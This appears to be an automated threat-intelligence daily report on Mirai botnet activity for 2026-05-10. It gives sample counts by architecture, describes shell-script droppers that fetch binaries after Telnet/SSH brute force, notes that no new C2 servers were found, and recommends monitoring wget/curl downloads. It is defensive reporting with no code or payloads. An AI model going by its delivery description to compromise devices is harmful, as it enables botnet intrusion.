Daily Summary
Mirai activity surged on 2026-05-10 with 100 new samples, a 75% increase over the 7-day average of 57. This marks the highest single-day volume observed in the current tracking period, indicating renewed interest in the DDoS botnet family. The spike is notable given the absence of new C2 servers, suggesting attackers are recycling or reconfiguring existing infrastructure.
New Samples Detected
A total of 100 unique samples were identified, with ELF files dominating at 36. This is consistent with Mirai’s typical cross-compilation targeting embedded Linux systems. Supporting architecture-specific binaries include .arm7 (8), .arm5 (7), .ppc (5), .x86_64 (5), .mips (5), .sh4 (4), .m68k (4), .sh (3), and .mpsl (3). The inclusion of .sh (shell script) samples is noteworthy as it suggests dropper scripts are being used to fetch and execute the main binary, potentially evading static file scanning.
Distribution Methods
Based on the file type distribution, delivery likely involves automated scanners that identify vulnerable IoT devices (e.g., Telnet/SSH brute force), followed by shell scripts that download architecture-specific binaries. The .sh samples serve as lightweight first-stage payloads. No new C2 or distribution URLs were identified today, indicating reliance on previously established attack vectors or IP-based delivery.
Detection Rate
Given that 100 new samples were detected with zero new C2 servers, there is a moderate risk that some variants are evading signature-based detection. The use of shell scripts as initial payloads may bypass AV engines that focus on ELF binaries. Static analysis of the .sh files suggests obfuscation techniques are minimal, but dynamic behavior analysis remains challenging.
C2 Infrastructure
No new C2 servers were identified today. This is unusual given the spike in samples, implying that attackers are reusing existing C2 IPs or domains. The lack of geographic data prevents identification of hosting trends. Analysts should monitor previously known Mirai C2 infrastructure for configuration changes.
7-Day Trend
Mirai activity has been fluctuating, with the 7-day average at 57. Today’s surge to 100 samples represents a sharp upward deviation, suggesting a coordinated campaign or updated loader. If volumes remain elevated over the next 48 hours, this may signal a new botnet build.
Security Analysis
A non-obvious observation is the resurgence of shell script droppers (.sh files) mixed with traditional ELF binaries. Historically, Mirai reduced use of shell scripts in favor of direct binary drops. This shift suggests attackers are testing lower-friction delivery methods to defeat network-level blocking of unknown ELF files. Defensive recommendation: Enable command-line monitoring for wget/curl downloads from IPs not on internal allowlists, and block execution of scripts downloaded from external hosts unless explicitly approved.